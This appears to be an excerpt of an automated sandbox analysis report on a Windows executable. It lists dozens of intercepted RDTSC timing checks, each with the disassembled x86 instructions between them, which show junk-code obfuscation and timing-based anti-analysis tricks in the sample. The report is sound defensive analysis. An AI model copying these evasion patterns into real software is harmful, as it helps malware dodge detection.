Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 98F10D second address: 98F114 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 98F114 second address: 98F138 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jne 00007FF4C0C3E166h 0x00000009 jmp 00007FF4C0C3E176h 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 98F138 second address: 98F13E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 98F13E second address: 98F142 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9CBC07 second address: 9CBC32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4C05015A4h 0x00000007 jmp 00007FF4C050159Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push edi 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9CBD9D second address: 9CBDD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FF4C0C3E174h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jmp 00007FF4C0C3E175h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9CE4B6 second address: 9CE4BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9CE8D9 second address: 9CE8DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9CE8DF second address: 9CE8F1 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF4C0501596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9CE8F1 second address: 9CE8F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9CE8F6 second address: 9CE900 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FF4C0501596h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9CEB35 second address: 9CEB4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4C0C3E176h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9CEFFC second address: 9CF002 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9CF002 second address: 9CF006 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9CF0A6 second address: 9CF0AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9CF2C5 second address: 9CF2C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9CF535 second address: 9CF556 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007FF4C05015A7h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9CF621 second address: 9CF66E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 jmp 00007FF4C0C3E16Ah 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007FF4C0C3E168h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 xor dword ptr [ebp+122D5632h], edx 0x0000002c push eax 0x0000002d pushad 0x0000002e jmp 00007FF4C0C3E16Dh 0x00000033 push eax 0x00000034 push edx 0x00000035 jg 00007FF4C0C3E166h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9CF66E second address: 9CF672 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9CFBCB second address: 9CFBCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9CFBCF second address: 9CFBD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9CFBD9 second address: 9CFBF1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4C0C3E16Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9CFBF1 second address: 9CFBF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9D1541 second address: 9D1545 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9D1545 second address: 9D1549 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9D1549 second address: 9D154F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9D154F second address: 9D15DA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FF4C05015A4h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e add dword ptr [ebp+122D27E1h], eax 0x00000014 push 00000000h 0x00000016 call 00007FF4C05015A8h 0x0000001b or dword ptr [ebp+122D180Eh], ecx 0x00000021 pop esi 0x00000022 push 00000000h 0x00000024 pushad 0x00000025 jns 00007FF4C050159Ch 0x0000002b call 00007FF4C05015A7h 0x00000030 call 00007FF4C05015A9h 0x00000035 pop edx 0x00000036 pop eax 0x00000037 popad 0x00000038 xchg eax, ebx 0x00000039 push ebx 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9D15DA second address: 9D15E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9D2083 second address: 9D20A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF4C05015A0h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e js 00007FF4C05015A0h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9D20A6 second address: 9D2145 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edx 0x0000000a call 00007FF4C0C3E168h 0x0000000f pop edx 0x00000010 mov dword ptr [esp+04h], edx 0x00000014 add dword ptr [esp+04h], 00000019h 0x0000001c inc edx 0x0000001d push edx 0x0000001e ret 0x0000001f pop edx 0x00000020 ret 0x00000021 mov dword ptr [ebp+122D2733h], ecx 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push ebp 0x0000002c call 00007FF4C0C3E168h 0x00000031 pop ebp 0x00000032 mov dword ptr [esp+04h], ebp 0x00000036 add dword ptr [esp+04h], 00000018h 0x0000003e inc ebp 0x0000003f push ebp 0x00000040 ret 0x00000041 pop ebp 0x00000042 ret 0x00000043 mov dword ptr [ebp+122D2246h], esi 0x00000049 jmp 00007FF4C0C3E179h 0x0000004e push 00000000h 0x00000050 mov esi, dword ptr [ebp+122D389Bh] 0x00000056 xchg eax, ebx 0x00000057 jg 00007FF4C0C3E181h 0x0000005d push eax 0x0000005e pushad 0x0000005f push eax 0x00000060 push edx 0x00000061 push ecx 0x00000062 pop ecx 0x00000063 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9D2CE6 second address: 9D2D4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov dword ptr [ebp+122D21DBh], edi 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push edi 0x00000016 call 00007FF4C0501598h 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], edi 0x00000020 add dword ptr [esp+04h], 00000015h 0x00000028 inc edi 0x00000029 push edi 0x0000002a ret 0x0000002b pop edi 0x0000002c ret 0x0000002d push 00000000h 0x0000002f mov edi, dword ptr [ebp+122D38F7h] 0x00000035 xchg eax, ebx 0x00000036 push edi 0x00000037 pushad 0x00000038 jmp 00007FF4C050159Bh 0x0000003d push edx 0x0000003e pop edx 0x0000003f popad 0x00000040 pop edi 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007FF4C05015A8h 0x00000049 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9D2D4B second address: 9D2D51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9D2D51 second address: 9D2D55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9D3667 second address: 9D366D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9D366D second address: 9D3688 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF4C050159Ch 0x00000008 jc 00007FF4C0501596h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jne 00007FF4C0501598h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9D4DFA second address: 9D4E61 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jbe 00007FF4C0C3E166h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov esi, dword ptr [ebp+122D1A01h] 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push esi 0x0000001a call 00007FF4C0C3E168h 0x0000001f pop esi 0x00000020 mov dword ptr [esp+04h], esi 0x00000024 add dword ptr [esp+04h], 00000014h 0x0000002c inc esi 0x0000002d push esi 0x0000002e ret 0x0000002f pop esi 0x00000030 ret 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push edi 0x00000036 call 00007FF4C0C3E168h 0x0000003b pop edi 0x0000003c mov dword ptr [esp+04h], edi 0x00000040 add dword ptr [esp+04h], 00000018h 0x00000048 inc edi 0x00000049 push edi 0x0000004a ret 0x0000004b pop edi 0x0000004c ret 0x0000004d or esi, 21A4A4E6h 0x00000053 mov dword ptr [ebp+122D1B88h], esi 0x00000059 xchg eax, ebx 0x0000005a push eax 0x0000005b push edx 0x0000005c push ecx 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9D4E61 second address: 9D4E66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9D4E66 second address: 9D4E7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF4C0C3E174h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9D6A32 second address: 9D6A3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop esi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9D6A3C second address: 9D6A43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9D9BD5 second address: 9D9BDF instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF4C0501596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9DA22C second address: 9DA231 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9DB378 second address: 9DB37C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9DC203 second address: 9DC218 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4C0C3E171h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9DB37C second address: 9DB39E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FF4C050159Ch 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF4C050159Ch 0x00000015 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9DB39E second address: 9DB3A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9DC2E8 second address: 9DC2ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9DD325 second address: 9DD345 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF4C0C3E166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FF4C0C3E173h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9DE1CE second address: 9DE1D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9DE35F second address: 9DE363 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9DF4FB second address: 9DF51F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007FF4C05015A4h 0x0000000d push eax 0x0000000e push edx 0x0000000f jns 00007FF4C0501596h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9DE363 second address: 9DE369 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9DE369 second address: 9DE373 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FF4C0501596h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9E03AF second address: 9E03D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4C0C3E179h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9E03D3 second address: 9E03D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9E221A second address: 9E221F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9E221F second address: 9E2224 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9E2224 second address: 9E229B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FF4C0C3E176h 0x0000000f nop 0x00000010 pushad 0x00000011 jne 00007FF4C0C3E168h 0x00000017 add dword ptr [ebp+122D1861h], edi 0x0000001d popad 0x0000001e push 00000000h 0x00000020 push ecx 0x00000021 sbb ebx, 194F2AFAh 0x00000027 pop ebx 0x00000028 mov bh, 29h 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push ebx 0x0000002f call 00007FF4C0C3E168h 0x00000034 pop ebx 0x00000035 mov dword ptr [esp+04h], ebx 0x00000039 add dword ptr [esp+04h], 00000017h 0x00000041 inc ebx 0x00000042 push ebx 0x00000043 ret 0x00000044 pop ebx 0x00000045 ret 0x00000046 mov di, cx 0x00000049 xchg eax, esi 0x0000004a push eax 0x0000004b jno 00007FF4C0C3E168h 0x00000051 pop eax 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 jc 00007FF4C0C3E16Ch 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9E229B second address: 9E229F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9E229F second address: 9E22B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF4C0C3E16Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9E41EF second address: 9E4250 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF4C0501596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007FF4C0501598h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 mov ebx, dword ptr [ebp+122D18B1h] 0x0000002b push 00000000h 0x0000002d mov ebx, dword ptr [ebp+122D221Eh] 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push eax 0x00000038 call 00007FF4C0501598h 0x0000003d pop eax 0x0000003e mov dword ptr [esp+04h], eax 0x00000042 add dword ptr [esp+04h], 00000018h 0x0000004a inc eax 0x0000004b push eax 0x0000004c ret 0x0000004d pop eax 0x0000004e ret 0x0000004f sub bh, FFFFFFE8h 0x00000052 push eax 0x00000053 pushad 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9E4250 second address: 9E4256 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9E4256 second address: 9E4263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007FF4C0501596h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9E1459 second address: 9E145E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9E145E second address: 9E1463 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9E151B second address: 9E1534 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF4C0C3E16Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9E52C5 second address: 9E52CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9E52CC second address: 9E52D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9E52D1 second address: 9E5319 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FF4C0501596h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e movsx edi, cx 0x00000011 mov bx, cx 0x00000014 push 00000000h 0x00000016 mov bx, dx 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push edi 0x0000001e call 00007FF4C0501598h 0x00000023 pop edi 0x00000024 mov dword ptr [esp+04h], edi 0x00000028 add dword ptr [esp+04h], 0000001Dh 0x00000030 inc edi 0x00000031 push edi 0x00000032 ret 0x00000033 pop edi 0x00000034 ret 0x00000035 movzx ebx, bx 0x00000038 push eax 0x00000039 pushad 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9E5319 second address: 9E533A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF4C0C3E179h 0x00000009 popad 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9E61DA second address: 9E61DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9E61DF second address: 9E6226 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF4C0C3E16Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov ebx, 45CED8FCh 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007FF4C0C3E168h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 00000017h 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e push 00000000h 0x00000030 or bx, CA01h 0x00000035 stc 0x00000036 xchg eax, esi 0x00000037 push eax 0x00000038 push edx 0x00000039 push esi 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9E6226 second address: 9E622B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9E622B second address: 9E6230 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9E54A0 second address: 9E54BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF4C05015A4h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9E54BF second address: 9E54C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
